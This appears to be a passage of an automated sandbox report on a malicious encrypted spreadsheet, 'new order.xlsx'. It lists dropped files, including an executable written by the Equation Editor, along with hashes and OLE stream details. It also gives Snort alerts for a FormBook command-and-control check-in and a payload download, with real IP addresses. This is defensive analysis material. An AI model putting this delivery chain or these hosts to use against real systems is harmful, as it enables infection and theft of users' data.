                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D8F69D3.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F7C9E9A.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97389FAC.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F241D1B.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.073078686684614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SO51L6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KjU+H3tWa6WdTfOYLpR8d
                                                                                                                                                  MD5:38F8AEF1B9B013E0B0068166B63A0E43
                                                                                                                                                  SHA1:A4DCB11C764BF5B40EE117A372735B2AFA0B55F7
                                                                                                                                                  SHA-256:6668AA81E5E7F205C8CD14960B057A1E3FE04D9591DC11157B3A652CA12EC34E
                                                                                                                                                  SHA-512:C7B6120132E3A8D0AA8C730283E8E695D770D2E740B7535AFEDE9E94E47F9431F12FBCDDB6A3BEBEE90A89E3DA30F31FC375B95EA822157CA71FD6501250550D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................}.6.).X.......d...................D..........p....\...D.......D..........p....D....6Pv...p....`..p.%}.$y.v.t|.........h......v..|.$.......d............^.p.....^.p.t|..t|........-........<.v................<.>v.Z.v....X..o.....%}........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D44E50E1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D54AA3BD.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E22CC16E.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\Desktop\~$new order.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):721408
                                                                                                                                                  Entropy (8bit):7.749166309747153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
                                                                                                                                                  MD5:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  SHA1:2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
                                                                                                                                                  SHA-256:994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
                                                                                                                                                  SHA-512:087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..`..............P.................. ... ....@.. .......................`............@.................................<...O.... ..X....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc.......@......................@..B................p.......H.......X....&...........................................................O.z....T....N..~/...-...u..JF.y?..E\.!.<._...|.dI..6.....\..<...j.......9....#`..U.E.....b........u..p...F.+..lq..).E=m....2...m.'.8/.dk.......Y.J.f..l...h.N.v.9B.*.........5%.kOUAK.......^...c0V...0.D.......................S........k1..c_.'T..zi:.....B..r.*v.c.N.r.P..o...{....(...M.3..0|.k.}4..Ki..#.y.+T1U..~....../......{..Z..!l'.>.E.EzL..Q.=7....X.P.qft.....1.%>....^..[c(.....)..s.0...

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.994753169045867
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:new order.xlsx
                                                                                                                                                  File size:1333760
                                                                                                                                                  MD5:d59accd992813d35bb00a4b3f84c4ffe
                                                                                                                                                  SHA1:851d437a71d1a156e0adb9f553611865b8c90d94
                                                                                                                                                  SHA256:002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
                                                                                                                                                  SHA512:7328ce416225e682b4b3f2c5c81427195144f3b030264d4a6dde967092b26165769bb87718843db8de6d56a6d1da3c8a2eb929f73b1c9720db3ca17a5fefad14
                                                                                                                                                  SSDEEP:24576:beO5efoW4hdgaEwAq4P1opC4O64Qgawpf0kkwgAEfH75:hFW4sasq4PONP4QoN7za75
                                                                                                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "new order.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1318984
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptedPackage
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1318984
                                                                                                                                                  Entropy:7.99890686533
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:4 . . . . . . . } . H . . . Y . . i . K . . ) _ . . . . . . . . ] . V M . . . . Y . . } . 4 v . _ . . ; . : c . # . ( . . _ e . . } . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z
                                                                                                                                                  Data Raw:34 20 14 00 00 00 00 00 fd 7d 8b 48 d2 b1 ca 59 15 f6 69 e8 4b e4 f2 29 5f f5 d4 f6 b7 19 e9 c6 17 5d 01 56 4d 19 01 8c ef 59 d0 8a 7d c9 34 76 9d 5f 06 e1 3b b9 3a 63 f2 23 19 28 98 1e 5f 65 a4 a9 7d ea 91 8a ad 8c c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a
                                                                                                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptionInfo
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:224
                                                                                                                                                  Entropy:4.52655354693
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . H . . . . . . = . . F . . 2 _ . t * . . . @ v % . ' . { h 7 . . . . . . # . s . . q . . . . c X . Y . . o . 7 V . . . . . n P s . 4 e
                                                                                                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/22/21-17:11:01.858671 | TCP | 2019696 | ET TROJAN Possible MalDoc Payload Download Nov 11 2014 | 49167 | 80 | 192.168.2.22 | 103.155.80.130
07/22/21-17:12:26.881021 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
07/22/21-17:12:26.881021 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
07/22/21-17:12:26.881021 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
07/22/21-17:12:27.021442 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 34.102.136.180 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:11:01.531136990 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:01.857800007 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:01.857975960 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:01.858670950 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.188283920 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.188322067 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.188349009 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.188378096 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.188388109 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.188409090 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.188417912 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.514086962 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.515700102 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.515753031 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.515809059 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.517229080 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.517246008 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.517287970 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.518718004 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.518737078 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
